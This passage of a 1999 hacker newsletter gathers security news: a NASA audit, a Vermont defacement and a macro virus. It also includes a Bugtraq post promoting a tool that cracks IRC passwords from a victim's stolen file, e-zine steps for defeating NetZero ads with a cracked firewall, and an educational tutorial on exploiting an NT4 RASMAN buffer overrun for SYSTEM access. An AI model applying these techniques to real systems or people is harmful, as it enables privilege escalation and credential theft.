once orders are downloaded to the merchant's PC. Using 128-bit encryption, approved for use by major banks, Catalog 3.0
guarantees complete protection for online shoppers.
"To avoid placing confidential customer information in jeopardy, e-commerce platforms must cover all the bases when it comes
to ensuring online security -- from protecting files stored on the Web server, to accounting for the possibility of human error,"
explained Kevin Grumball, CEO of Actinic Software. "Catalog offers an easy-to-use interface, and keeps sensitive information
encrypted at all times, eliminating all possible security hazards for online shoppers."
To ensure total e-commerce security, Catalog 3.0 encrypts sensitive data on the buyer's PC using a Java applet, and also
operates with SSL sites. Credit-card purchases are securely processed through the site using 128-bit encryption. Orders are
downloaded directly to the merchant's PC for processing. The Web server is used only as a mailbox, to which only the
merchant holds the key. No sensitive data is ever visible on the server, and all details are stored safely on the merchant's PC,
providing customers with the end-to-end security they need.
Catalog 3.0 offers all the components necessary to build a fully secure e-commerce site. The total solution includes a
Web-based catalog, electronic shopping cart, online ordering, expanded payment options, encrypted security, and more.
Catalog 3.0 is available now, priced at $399. Contact Actinic for more details.
About Actinic Software LLC
Founded in 1996, Actinic Software LLC is located in East Brunswick, N.J., with offices in the UK. The company develops
Internet commerce software solutions. Its flagship product, Actinic Catalog 3.0, is a secure, low-cost, and easy-to-use
plug-and-play solution for the rapid deployment and maintenance of an e-commerce site. Visit Actinic Software on the Web at
http://www.actinic.com.
Contact: Actinic Software, East Brunswick Kevin Grumball, 732/238-8007 kgrumball@actinic.com or Springboard Communications Kevin
McLaughlin, 732-863-1900 kmclaughlin@s-board.com
@HWA
44.0 MP3's off the net?
~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
MP3 Web sites to be Reported
contributed by Space Rogue
M. Ken Co., Ltd., a developer of electronic watermarking technology, will begin on June 1st to list web sites that
contain illegal MP3s. The company will offer these lists to companies that are seeking copyright infringements
on the web; it will also publish this information on its web site. The service will use an agent developed by M.
Ken. The agent can search and locate MP3 files on the Web. During a test over 400 illegal sites were found.
AsiaBiz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70746
@HWA
45.0 Free DNS!
~~~~~~~~~
From HNN http://www.hackernews.com/
FREE DNS!
contributed by ratko
IHN is a project being built to bring people free host names and URL forwarding as well as many more
features. Like the now defunct ml.org, IHN promises DNS for the masses. There are also free URL-forwarding
hosts, and soon to come, IRC proxying.
"Now you can go to any IRC server and have your domain show up as an IHN
domain. Currently in progress..." domains include ihn.org, clan.net and darpa.org ...
Internet Host Network
http://www.ihn.org
@HWA
46.0 pIRCHCrack cracks password in pirch.ini files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 14 May 1999 04:56:55 PDT
Reply-To: Mike Arnold <mikey27@HOTMAIL.COM>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Mike Arnold <mikey27@HOTMAIL.COM>
Subject: pIRCH32/98 Exploit
To: BUGTRAQ@netspace.org
pIRCH version 32 and 98 save the user's NickName password onto disk in
c:\pirch32\pirch.ini or c:\pirch98\pirch.ini depending on what version.
pIRCH encrypts the password, but I have released a program that can crack the
password if you supply the .ini. You need to get the victim's pirch.ini file
somehow, maybe Social Engineering or whatever, then run pIRCHCrack against
it. The user may also use the same password for their ISP, E-mail etc.
pIRCHCrack is available at
http://members.xoom.com/zaiman/pirchcrack.zip
--Mike
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com
@HWA
47.0 NASA vulnerable to attack
~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
NASA Vulnerable To Attack
contributed by McIntyre
The General Accounting Office released a report yesterday (Thursday) that labels 135 of 155 of NASA's
mission-critical systems as not meeting the agency's own requirements for security. The GAO enlisted the
help of the NSA to simulate an attack on NASA using publicly available tools such as war dialers. Although
NASA performed an internal review of its information security policies last May that found many of the same
problems identified by the GAO, few of the recommended fixes had been implemented. Satellite command and
control systems as well as launch controls are not linked to the internet and were not at risk during
these simulated attacks.
MSNBC
http://www.msnbc.com/news/271662.asp
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0517/web-nasa-5-20-99.html
MAY 20, 1999 . . . 17:20 EDT
Federal Computer Week
GAO unearths computer security weaknesses at NASA
BY DIANE FRANK (dfrank@fcw.com)
Many of NASA's mission-critical information systems are vulnerable to
attack, and almost all the systems do not meet the agency's own requirements
for risk assessment, according to a General Accounting Office report released
today.
In tests conducted by GAO at one of NASA's field centers, experts were
able to penetrate several mission-critical systems, including one responsible for
calculating the positioning data for spacecraft.
"Having obtained access to these systems, we could have disrupted NASA's
ongoing command and control operations and stolen, modified or destroyed
system software and data," the report states.
GAO attributed much of the success of the attacks to NASA's lack of
consistent information security management and policies as suggested by
GAO's 1998 Executive Guide. And although NASA performed a special
review of its information security program last May that found many of the
same problems identified by GAO, few of the recommended fixes have been
started, according to the report.
GAO recommended that NASA put in place an agencywide security program
addressing five areas: assessing risks and evaluating needs; implementing
policies and controls; monitoring compliance with policy and effectiveness of
controls; providing computer security training; and coordinating responses to
security incidents.
@HWA
48.0 Vermont's Security Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by McIntyre
Yet another Cold Fusion hole is responsible for the security breaches of the web site of the state of
Vermont. Bob West, the state's deputy chief information officer, claimed the state's computers that contain
the home page and other public documents are not considered secure against computer attack. (There are
a lot of pretty funny, or pretty sad, quotes in this article.)
HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
The Boston Globe
http://www.boston.com/dailynews2/141/region/Hackers_get_into_state_of_VermP.shtml
Hackers get into state of Vermont computer system
By Wilson Ring, Associated Press, 05/21/99 09:48
MONTPELIER, Vt. (AP) - Hackers cracked into the state's computer system Thursday, inserting
at least three unauthorized messages into it.
State officials said they received no complaints from the public about anything that appeared on the
state's World Wide Web site.
A computer security official from Boston said that for at least four hours Thursday morning a visitor
to the state's home page was greeted by a page entitled ''Hackfactor X'' that contained a series of
profanities and the message, ''Well, I can see how well our tax dollars are being spent on computer
security.''
Hidden deep into the state's system, which is not readily accessible to the public, was another
message entitled ''A Changing World'' that was signed ''hacked for freedom,'' and another that
carried the caption, ''use this only for good, not evil.''
State officials were initially unaware of the assault on their computers. But once the location of the
messages were pointed out by The Associated Press they were erased within minutes.
Bob West, the state's deputy chief information officer, said there was no evidence the main Web
page was tampered with.
''I am not sure where that came from,'' West said of the report. ''I would have gotten e-mails like
crazy if that had happened.''
But he was also unaware that the less public files had been tampered with until they were pointed
out to him. ''Most people would never have found that,'' he said.
In any event, the state's computers that contain the home page and other public documents are not
considered secure against computer attack, West said.
''Anything on that box is backed up and is restorable and is not considered confidential,'' West said.
If the system failed, ''it wouldn't stop any operation in state government.''
Critical state business - such as personnel and tax records - is done on computers that are
protected by ''firewalls'' and are believed invulnerable to unauthorized access, West said.
The hacker took advantage of the software that runs the state's computer servers, said Weld Pond,
a computer security consultant with the Boston company l0pht. The vulnerability of the software has
been well known, but it was installed on many computer systems years ago and officials never
bothered to correct the problem, Pond said.
Pond looked at the state's page and said it appeared it was hacked twice on Thursday. The last
illegal visitor ''closed'' the hole that allowed the site to be hacked, he said.
''Hackers definitely close holes after they are in,'' Pond said. ''They don't want somebody else in it.''
The attack on the state system was first reported on the computer Web site known as attrition.org.
The site is used to point out to the information industry how vulnerable computer systems can be
and to record those assaults for history.
B.K. DeLong of Boston helps maintain the site. He said he got an e-mail message at about 4:30
a.m. pointing out the assault on the Vermont system. He said the untraceable e-mail was probably
sent by the hacker, who wanted to highlight his or her achievement.
DeLong said he saw the Hackfactor X site at about 8:30. It had been taken off the state system by
about 9 a.m.
''They can insist all they want, but it's been seen,'' DeLong said of West's denial about the
tampering.
The site that DeLong said was posted in place of the state's traditional home page can still be
viewed at www.attrition.org/mirror/attrition.
Computer hacking is a federal crime, but Vermont's U.S. Attorney, Charles Tetzlaff, said Thursday
he was unaware of the assault on the state's home page.
@HWA
49.0 NIST May Be Named Info Security Clearing House
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by erewhon
The House Science Committee will soon push to update the 1989 Computer Security Act. The new bill will
closely resemble the Computer Security Enhancement Act of 1997 which never made it out of the Senate.
This new legislation would tap the National Institute of Standards and Technology (NIST) as the lead agency
for information security. (What about NIPC, CERT, and the FBI? How many agencies do we need?) The new bill
also pushes for increased federal use of commercial off-the-shelf products for security needs.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0517/web-security-5-20-99.html
MAY 20, 1999 . . . 14:11 EDT
House panel aims to bolster security law
BY MARGRET JOHNSTON (margret_johnston@fcw.com)
WASHINGTON, D.C. -- The House Science Committee plans to make
another push to update a 1989 law that requires civilian agencies to take
measures to protect their computer systems, according to Rep. Constance
Morella (R-Md.), chairwoman of the Technology Subcommittee of the House
Science Committee.
The new bill, which could be introduced as early as next week, would revamp
the 10-year-old Computer Security Act. The bill will closely resemble the
Computer Security Enhancement Act of 1997, which the House passed only
to have it die in the Senate last year, said Morella, speaking at a symposium
sponsored by the SmartCard Forum.
Like the 1997 bill, the proposed legislation would tap the National Institute of
Standards and Technology as the lead agency for information security. The
preceding bill also would have required NIST to promote federal use of
commercial off-the-shelf products for civilian security needs.
The committee first began its effort to revamp the existing law to reflect the
proliferation of network technology that has left agency data more vulnerable
to corruption and theft, Morella said in 1997.
@HWA
50.0 097M.Tristate Macro Virus Contained
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by wdef-A
Symantec and Network Associates have posted new definitions to eradicate the 097M.Tristate macro virus.
This new virus also known as Triplicate and Crown cross-infects Microsoft Word documents, Excel
spreadsheets, and PowerPoint presentations. The virus has the ability to destroy data and removes
virus-warning protection from both Excel and Word.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11064,00.html
Hunters Contain Office Macro Virus
Symantec, McAfee inoculate for 097M.Tristate macro virus.
by Christian McIntosh, PC World
May 20, 1999, 6:38 p.m. PT
The heat of the race to detect and nullify new viruses appears second only to the contest among virus
fighters to be first with the cure.
Two antivirus leaders, Symantec and Network Associates' McAfee division, have nabbed a new macro
virus that threatens files created by Microsoft Office applications. Both have posted new definitions that
detect and eradicate the 097M.Tristate macro virus.
You can download the new definitions for any Symantec antivirus product from LiveUpdate, the
company's antivirus service, which pushes virus updates to registered Symantec customers.
"It's a scheduled component that checks frequently for new virus threats," says Enrique Salem, Symantec's
chief technology officer.
Unregistered Symantec customers can get the new definitions from the Symantec AntiVirus Research
Center on the company's Web site.
You can also eradicate the 097M.Tristate virus using McAfee's VirusScan updated with the most recent
definition file, available on the company's Web site. VirusScan also will prompt you to periodically update
your virus definitions data.
"Trendy" Macro Viruses
Macro viruses similar to 097M.Tristate are popular among virus writers, according to Symantec officials.
The 097M.Tristate macro virus cross-infects Microsoft Word documents, Excel spreadsheets, and
PowerPoint presentations.
The 097M.Tristate virus creates a viral workbook called BOOK1 in the Excel startup directory. In PowerPoint,
097M.Tristate adds a viral module that's linked to the AutoShape object covering an entire slide. During its
final leg, 097M.Tristate replaces the content of an infected Word document with viral code.
Once considered the exclusive domain of research labs, macro viruses have transitioned into general
circulation. Despite its prolific reproduction, Symantec classifies 097M.Triplicate as rare, saying it has
yet to spread beyond the United States. The 097M.Tristate macro virus, also known as Triplicate and Crown, is
currently the eighth most common virus submitted to Symantec's lab. The company's Scan & Deliver system
has received 132 submissions of the 097M.Tristate virus in the past two weeks.
McAfee classifies 097M.Tristate as high risk. The virus apparently removes virus-warning protection from both
Excel and Word.
@HWA
51.0 "Hackers" Ruin Online Poll
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by The Silicon Sorceror
According to the Toronto Star, "online hackers" used ballot stuffing to spoil an online poll to find the
popular winner of Ontario's political candidate debate. The poll was designed so that each person could vote
only once, but apparently it wasn't designed well enough and "some political junkies with computer skills had
the time to write programs defeating the precautions" (Translation: Somebody clicked their mouse button
about 5 times and banged out a script).
The Toronto Star
http://www.thestar.com/editorial/news/990520NEW15b_NA-WEB20.html (article moved)
52.0 DSC v1.01 Released
~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by {b|4iz3}
DSC v1.01 has been released. DSC is a new e-zine for
those who are taking their "first steps" into learning
computer security. A good setup and easy readability
are among the best parts of this new e-zine. Get yours
today.
DSC v1.01 Released
http://bl4iz3.faithweb.com/hacking/
Sample article on 'free internet' access from the DSC website;
_________________________________________________________________________________________
| -- ---- |
| g3t fr33 1nt3rn3t 4cc3ss __ | | | \/ ||
| fr0m {b|4iz3} of the -=D3P SQU4D CR3W=- -- | | | /\ ||
| http://bl4iz3.faithweb.com/ -- ---- |
|_________________________________________________________________________________________|
| |
| ________________________________________________________________ |
| |\ ____________________________________________________________ /| |
| | |\ ________________________________________________________ /| | |
| | | | _________________ _______________ ________________ | | | |
| | | | |_______________ \| ____________|/ ______________| | | | |
| | | | \ | |____________/ / | | | |
| | | | | |_____________ | | | | | |
| | | | _______________/ /_____________| | \______________ | | | |
| | | | |_________________/|_______________|\________________| | | | |
| | | |________________________________________________________| | | |
| | |/__________________________________________________________\| | |
| |/______________________________________________________________\| |
| |
| ****************************************** |
| ******* -=D3P SQU4D CR3W=- ******* |
| ****************************************** |
| *** http://bl4iz3.faithweb.com *** |
| ****************************************** |
| *** th1s h4ck pr0v1d3d t0 y0u by: *** |
| * {b|4iz3} 0f th3 -=D3P SQU4D CR3W=- * |
| ****************************************** |
| |
| _________________________________________________________________________________ |
| |_________________________________________________________________________________| |
| |
| _________________________________________________________________________________ |
| | _____________________________________________________________________________ | |
| | | -- ---- | | |
| | | h0w t0 g3t fr33 1nt3rn3t 4cc3ss __ | | | \/ || | |
| | | br0ught t0 y0u by {b|4iz3}! -- | | | /\ || | |
| | | -- ---- | | |
| | |---------------------------------------------------------------------------- | | |
| | | | | |
| | | C:\>cd progra~1 | | |
| | | | | |
| | | C:\program files\> | | |
| | | | | |
| | | C:\program files\>NetZero.bat | | |
| | | | | |
| | | C:\> Free Internet provided by: | | |
| | | -=D3P SQU4D CR3W=- | | |
| | | http://bl4iz3.faithweb.com | | |
| | | Bad command or file name | | |
| | | Bad command or file name | | |
| | | | | |
| | | | | |
| | |_____________________________________________________________________________| | |
| | | |
| | | Status: Running Program Files | | Time Elapsed: 00:43 | | |
| |_________________________________________________________________________________| |
| |
| _________________________________________________________________________________ |
| |_________________________________________________________________________________| |
| |
| To get free internet access, please follow the following steps: |
| |
| 1)Download NetZero(A FREE ISP) at "http://members.xoom.com/HFDWPack/files/NetZero.exe" |
| |
| 2)Setup NetZero, and install into DEFAULT location. |
| a)Sign on for the first time and answer all those stupid questions(or they'll deny |
| you service) |
| |
| 3)Download ConSeal PC Firewall. at "http://bl4iz3.faithweb.com/hacking/files/ |
| ConSeal.exe" |
| |
| 4)Install ConSeal PC Firewall, set it up as custom, and BLOCK ALL ICMP (this will |
| stop all the ads NetZero will try and send you). REMEMBER: Install into DEFAULT |
| locations. |
| |
| 5)Download Conseal PC Firewall Crack. at "http://bl4iz3.faithweb.com/hacking/ |
| files/ConSeal135Crack.zip |
| a)Replace FRW.EXE in the zip file with FRW.EXE in "c:\program files". |
| |
| 6)Download NetZero batch file (YOU MUST SAVE THIS TO "c:\program files") create a |
| link to this on the desktop, that way you can just double-click to free internet |
| access anytime you want. |
| |
| 7)Now, every time you want to run your FREE internet access, just click on the |
| NetZero batch file. |
| |
| _________________________________________________________________________________ |
| |_________________________________________________________________________________| |
| |
| |
| Now, to explain the glitches in their system: |
| |
| NetZero sends a command, I believe through ICMP, which turns the dialup |
| program into an ad banner. This banner shows the ads which makes this service free. |
| |
| Now, the firewall blocks this command which turns the program into the ad banner. |
| Therefore, the ad NEVER starts up, and as far as Net Zero knows, the command went |
| through and BLAM, you're running a free ISP with NO ADS. |
| |
| I have not, as of this date, checked what makes this program change into the ad |
| banner, and eventually, I will TRY and find or make a crack for NetZero so you |
| won't have to go through with all this Firewall stuff. |
| ________________________________________________________________________________________|
| |
| k0pywr0ng (k)1999 -=D3P SQU4D CR3W=- |
| Check out http://bl4iz3.faithweb.com/kopywrong/ |
|_________________________________________________________________________________________|
53.0 Laser Pointers Illegal?
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Code Kid
The San Francisco Housing and Social Policy Committee
will soon classify laser pointers in the same category as
spray paint, making it illegal for those under 18 to
purchase or possess them. Since limiting the sale of
spray paint cans has worked exceedingly well in
preventing graffiti in major cities it is thought that a
similar ban on laser pointers would be equally effective.
San Francisco Examiner
http://www.sfgate.com/cgi-bin/article.cgi?file=/examiner/archive/1999/05/20/EDITORIAL14125.dtl
Use a laser, go to jail
EXAMINER EDITORIAL WRITER May 20, 1999
CONSIDER the what-can-go-wrong-WILL-go-wrong provisions of Murphy's Law and its corollaries, such as the Rule
of Toast by which the buttered side always hits the floor. Next comes the Law of Unintended
Consequences, particularly the high-tech subsections that gave us e-mail spam, undumpable
atomic waste, MTBE in our water, extortionate ATM fees and surrender of privacy to corporate
hackers.
Question: What do you get when you marry the laws of Murphy and Unintended Consequences?
Answer: The laser pointer.
These ingenious devices, originally intended as high-tech aids to professors and lecturers, send little
red beams as far as 1,500 feet. And, according to San Francisco Supervisor Michael Yaki, "These
so-called toys can distract, annoy and even injure other people when misused."
Accordingly, Yaki persuaded the board's Housing and Social Policy Committee on Tuesday to approve
a proposed ordinance patterned after laws in New York and other cities. It would make it a
crime to sell laser pointers to persons under age 18. It would compel storekeepers to keep them locked
up - as with cans of spray paint suitable for graffiti and tags - to discourage teen shoplifters. It would
make it a serious crime to point a beam at another person's face or, because of the possibility of a
driver's temporary blindness, at a moving vehicle.
Yes, it's true that the ban on sale of spray paint to juveniles didn't exactly put an end to tags and
graffiti. And laser pointers are considerably less dangerous than the lethal handguns far too
accessible to far too many kids. But we agree with Police Lt. Patricia Jackson, who called the pointers
an annoyance with disruptive potential.
The full board should approve Yaki's law and hope that it won't have unintended consequences of its
own.
©1999 San Francisco Examiner Page A 26
@HWA
54.0 Exploiting NT buffer overruns
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS http://www.net-security.org/
NT 4 BUFFER OVERRUNS
by BHZ, Thursday 20th May 1999 on 10.50 pm CET
David Litchfield reported to BugTraq a study on exploiting NT 4 Buffer Overruns. "This
document is for educational purposes only and explains what a buffer overrun is and
shows how they can be exploited on the Windows NT 4 operating system using
RASMAN.EXE as a case study. We will take a look at Windows NT processes,
virtual address space, the dynamics of a buffer overrun and cover certain key issues
such as explaining what a stack is and what the ESP, EBP and EIP CPU registers
are and do". Read the study below.
Exploiting Windows NT 4 Buffer Overruns
A Case Study: RASMAN.EXE
Introduction
This document is for educational purposes only and explains what a buffer overrun is and shows how they can be exploited on the Windows NT 4 operating system
using RASMAN.EXE as a case study. We will take a look at Windows NT processes, virtual address space, the dynamics of a buffer overrun and cover certain
key issues such as explaining what a stack is and what the ESP, EBP and EIP CPU registers are and do. With these covered we'll look into the buffer overrun found
in RASMAN.EXE. This document may be freely copied and distributed only in its entirety and if credit is given.
Cheers, David Litchfield
What is a buffer overrun?
A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with the extra overflowing
and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source:
#include <stdio.h>
int main ( )
{
char name[31];
printf("Please type your name: ");
gets(name);
printf("Hello, %s", name);
return 0;
}
When this source is compiled and turned into a program and the program is run it will assign a block of memory 32 bytes long to hold the name string. Under normal
operation someone would type in their name, for instance "David", and the program would then print to the screen "Hello, David". David is 5 letters long, with each
letter taking up a single byte. The end of a string, though, is denoted by a thing called a null terminator - which is basically a byte with a value of zero. So we need to
add a null terminator to the end of the string making a total length of 6 bytes. It is clear that 6 bytes will fit into the 32 bytes set aside to store the name string. If
however, instead of entering "David", we entered
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
that is 40 capital As, when the program reads in our input and places it in our buffer it overflows. 40 will definitely not fit into 32.
It so happens that if we enter 40 As we completely overwrite the contents of a special CPU register known as the Instruction Pointer or EIP - the E stands for
Extended by the way. A quick explanation of a register - a computer's processor has small memory storage units called registers. Access to the values held in these
registers is very quick. These registers have special names and can hold memory addresses and variables. The EIP is one of these registers and holds the memory
address of the next instruction to execute. What do I mean by instruction? A program contains a list of instructions for the processor to carry out in order for the
program to do its job, much like a recipe contains instructions for a cook to carry out in order to make a cake. These instructions are known as operation codes or
opcodes for short. So when a program is running and the processor is executing one of the program's instructions the EIP holds the memory address where the next
instruction to be executed can be found. After the current instruction has been executed the processor goes to that memory address and pulls in the instruction found
there and then increments the EIP and then executes that instruction. This process of pulling the opcode from the memory address pointed to by the EIP, then
incrementing the EIP then executing that instruction continues until the program exits.
Going back to our code, the fact that we have overwritten the EIP means that we can effectively tell the CPU to go to a memory address of our choosing and pull
down the instruction found there and execute that. Because we are filling the buffer with As we overwrite the EIP with 0x41414141 - 41 is the hex value for a capital
A. The processor then goes to address 0x41414141 and tries to read in the instruction found at that address. If there's no instruction there we get a thing known as
an Access Violation. Most people will know of this as a message popping up saying something like "The Instruction at '0x41414141' referenced memory at
'0x41414141'. The memory could not be read." If we had filled our buffer with Bs we would overwrite the EIP with 0x42424242 essentially telling the processor to
go to that memory address to get the next instruction, and more than likely we'd get the same Access Violation.
Exploiting a buffer overrun.
As you'll see later on, being able to overwrite the EIP is vital to exploiting a buffer overrun. When you exploit a buffer overrun you basically get the processor to
execute instructions or code of your choosing getting the program to do something it would not normally do. You do this by pointing the EIP back into the buffer
which you load with your own opcodes, which are then executed. This begs the question, "Why would someone want to do this?"
Windows NT, like UNIX systems, requires a user to log into the system. Some users are very powerful, such as the Administrator, and others are just your average normal user that aren't as powerful. If a normal user wanted to become equivalent to the Administrator, and thus just as powerful with almost full control of the system, they could exploit a buffer overrun to attain this. The problem is the buffer overrun needs to be in a process that has enough power and privileges to be able to make them an Administrator, so there is no point in buffer overrunning a process that they, the user themselves, have started. They need to buffer overrun a process started by the system and then get the process to execute their own arbitrary code. The system account is very powerful, and if you can get a system process to do something, such as open a Command Prompt, then it will run with system privileges. In Windows NT, if a process starts a new child process then the child process normally inherits the access token of the parent process - normally, but not always, because some processes can be started using the Win32 CreateProcessAsUser ( ) function, which will start the new process under the security context of another user, and thus the new process will have a different access token than the parent process. An Access Token is like a set of keys - it denotes a user's rights and privileges, which determine what they can and cannot do to the machine. An example of this is screen savers. The winlogon.exe system process is responsible for starting a user's screen saver. As opposed to running the screen saver in the security context of the system, winlogon uses CreateProcessAsUser ( ) to start the screen saver in the security context of the currently logged on user. I digress - back to buffer overruns. In this case study we'll look at the buffer overrun in RASMAN.EXE, a system process, and get it to open a Windows NT Command Prompt. This Command Prompt will have the access token of the system account, and so will any other processes started from it. But first a bit more on an NT process' virtual memory layout.
A process embodies many things such as, amongst others, a running program, one or more threads of execution, the process' virtual address space and the dynamic link libraries (DLLs) the program uses. The process has 4 GB of virtual address space to use. Half of this, from address 0x00000000 to 0x7FFFFFFF, is private address space where the program, its DLLs and stack (or stacks in the case of a multithreaded program) are found, and the other half, address 0x80000000 to 0xFFFFFFFF, is the system address space where such things as NTOSKRNL.EXE and the HAL are loaded. As a side note, this default behaviour can be changed as of service pack three - you can specify a switch in the boot.ini - /3GB - that will assign 3 GB as private address space and 1 GB as system address space. This is to boost the performance of programs, such as databases, that require large amounts of memory.
When a program is run NT creates a new process. It loads the program's instructions and the DLLs the program uses into the private address space and marks the
pages it uses as read-only. Any attempt to modify pages in memory marked as read only will cause an Access Violation. The first thread is started and a stack is
initialised.
The Stack
What's the simplest way to describe a stack? Try this: Imagine a carpenter. He has tools, materials and instructions. To be able to make something, though, he needs a workbench. The stack is similar to this workbench. It is a place where he can use his tools to shape and model his raw materials. He can put something down on
the workbench, say waiting for the glue to dry on two bits of wood and do something else. When that task is complete he can come back to his two bits of wood
and continue with that. The workbench is where most of the work is done.
So too, in a process, the stack is where most things are done. It is a writeable area of memory that dynamically shrinks and grows as is needed or determined by the program's execution. When a programmatic task is started it'll place data on the stack, whether these be strings, memory addresses, integers or whatever, then manipulate them, and when the task has completed it will return the stack to its original state so that the next task can use it if it needs to. Working in this way the process interacts with the stack using a method known as Last In, First Out or LIFO.
There are two registers that are crucial to the stack's functionality - they are used by the program to keep track of where data can be found in memory. These two
registers are the ESP and the EBP.
The ESP, or the Stack Pointer, points to the top of the stack: it contains the memory address where the top of the stack can be found. The ESP can be changed in a number of ways, both indirectly and directly. When something is PUSHed onto the stack the ESP is pushed out accordingly, and when something is POPped off the stack it is pulled back in. The PUSH and POP operations modify the ESP indirectly. But you can also manipulate the ESP directly, with say an instruction of "SUB esp,04h" which pushes the stack out by four bytes or one word. For those that haven't yet been numbed into boredom, something may just have irked: how is it that you SUBtract 4 from the ESP and yet the ESP is pushed out? Well, this is because the stack works backwards. The bottom of the stack uses a memory address higher than the top of the stack:
----------------0x12121212 Top of the stack
...
...
----------------0x121212FF Bottom of the stack
Here we have definitive proof that the fathers of modern computing were indeed closet sadists or had shares in makers of paracetamol - occasionally they throw in gems like this to make that headache that bit more acute. When we say the stack increases in size the address held in the ESP decreases. Conversely, when the stack size decreases the address held in the ESP increases. Reaching for the Aspirin yet?
Our second stack related register is known as the EBP or the Base Pointer. The EBP holds the memory address of the bottom of the stack - more accurately, it points to a base point in the stack that we can use as a reference point within a given programmatic task. The EBP must have meaning to a given task, and to facilitate this, before the task's real business is started a setup procedure known as the "procedure prologue" is first completed. What this does is, firstly, save the current EBP by PUSHing it onto the stack. This is so that the processor and program will know where to pick up from after the currently executing task has completed. The ESP is then copied into the EBP, thus creating a new Base Pointer that the currently executing task can use as a reference point irrespective of how the ESP changes during the task's execution. Continuing with this, let's say an 11 character string was placed onto the stack - our EBP remains the same but the ESP has been pushed out by 12 bytes. Then say an address was PUSHed onto the stack - our ESP is pushed out by another 4 bytes, though our EBP still remains the same. Now let's say we needed to reference the 11 byte string - we can do this by using our EBP: we know the first byte of our string (the pointer to the string) is twelve bytes away from the EBP, so we can reference this string's pointer by saying "the address found at EBP minus 12". (Remember the stack goes from a higher address to a lower address.)
RASMAN and buffer overruns.
Finding the buffer overrun
The first thing you need to do to be able to exploit a buffer overrun is to a) know about an existing one or b) find your own one. In the case of RASMAN, the overrun was found by looking at the RAS functions and the structures they used. Notice that some of the functions, such as RasGetDialParams ( ), fill structures that contain character arrays, much like the char name[31] character array in the C code above. By playing around with the rasphone.pbk file, the RAS Phone Book, where dialing details, such as the phone number to be dialed, are stored, you can root out these overruns. Make a phone book entry called "Internet", which dials into your ISP, dial it, and download your mail. This is important as this adds to the Registry an entry for the domain name of your mail server as an Autodial location. That is, if you try to contact your mail server from that point on without being dialed into the Internet, the Connection Manager will kick in and automatically dial for you. RASMAN is the process that handles this functionality. Once you have done this, change the telephone number to a long string of As and then attempt to connect to your mail server, say, by opening Outlook Express. This causes RASMAN to read in from rasphone.pbk the telephone number to dial to be able to get to your mail server. But instead of the real telephone number the long string of As is read instead and fills a character array in the RAS_DIAL_PARAMS structure, which overflows, causing an Access Violation - at address 0x41414141. We've found a buffer overrun and, more exciting, overwritten the EIP.
Finding where the EIP is overwritten
By experimenting with the length of the "telephone number" we find that we overwrite the EIP with bytes 296,297,298 and 299 of our string. (You'll find that, if you
are actually following this, you'll need to reboot the system after the overflow to be able to restart the service, and you'll have to end tasks such as AthenaWindow
and msmin.exe.) Once we have found where we overwrite the EIP it is time to get out the debugger - the debugging capabilities of Visual C++ are very good.
Attach to the RASMAN process and then get it to dial - or attempt to at least. Wait for the access violation.
Analyze what's going on.
Once the access violation has occurred we need to look at the stack and the state of the CPU's registers. From this we can see that we also overwrite the EBP, which will come in handy later on, and that the address of the first A of our "telephone number" is 0x015DF105. By getting RASMAN to access violate a number of times we find that the first A is always written to this address. This is the address we're going to set the EIP to, so that the processor will look at that address for the next instruction to execute. We'll stuff the "telephone number" full of our own opcodes that will get RASMAN to do what we want it to do - our arbitrary code. We then need to ask, "What do we want it to do?".
Where do you want to go today? - What do you want to achieve?
The best thing to do, as we need to be at the console to get this to work, is get RASMAN to open up a Command Prompt. From here we can run any program we want with system privileges. The easiest way to get a program to run a Command Prompt, or any other program for that matter, is to use the system ( ) function. When the system ( ) function is called it looks at the value of the ComSpec environment variable, normally "c:\winnt\system32\cmd.exe" on Windows NT, and executes that with a "/C" switch. The function passes cmd.exe a command to run and the "/C" switch tells cmd.exe to exit after the command has finished executing. If we pass "cmd.exe" as the command - system("cmd.exe"); - this will cause the system function to open up cmd.exe with the "/C" switch and execute cmd.exe - so we are running two instances of the command interpreter - however the second one won't exit until we tell it to (and nor will the first until the second one has exited).
Rather than placing the opcodes that actually form the system ( ) function in our exploit string it would be easier to simply call it. When you call a function you tell the program to go to a certain DLL that contains the code for the function you are calling. The use of DLLs means that programs can be smaller in size - rather than each program containing the necessary code for each function used they can call a shared DLL that does contain the code. DLLs are said to export functions - that is, the DLL provides an address where a function can be found. The DLL also has a base address so the system knows where to find that DLL. When a DLL is loaded into a process' address space it will always be found at that base address, and the functions it exports can then be found at an entry point within the base. The system ( ) function is exported by msvcrt.dll (the Microsoft Visual C++ Runtime library), which has a base address of 0x78000000, and the system ( ) entry point can be found at offset 000208C3 (in version 5.00.7303 of msvcrt.dll anyway), meaning that the address of the system ( ) function is 0x780208C3. Hopefully msvcrt.dll will already be loaded into RASMAN's address space - if it isn't we'll need to use LoadLibrary ( ) and GetProcAddress ( ). Fortunately RASMAN does use msvcrt.dll and so it is already in the process address space. This makes the job of exploiting the buffer overrun very easy indeed - we'll simply build a stack with our string of the command to run (cmd.exe) and call it. What makes it even better is that the address 0x780208C3 has no nulls (00) in it. 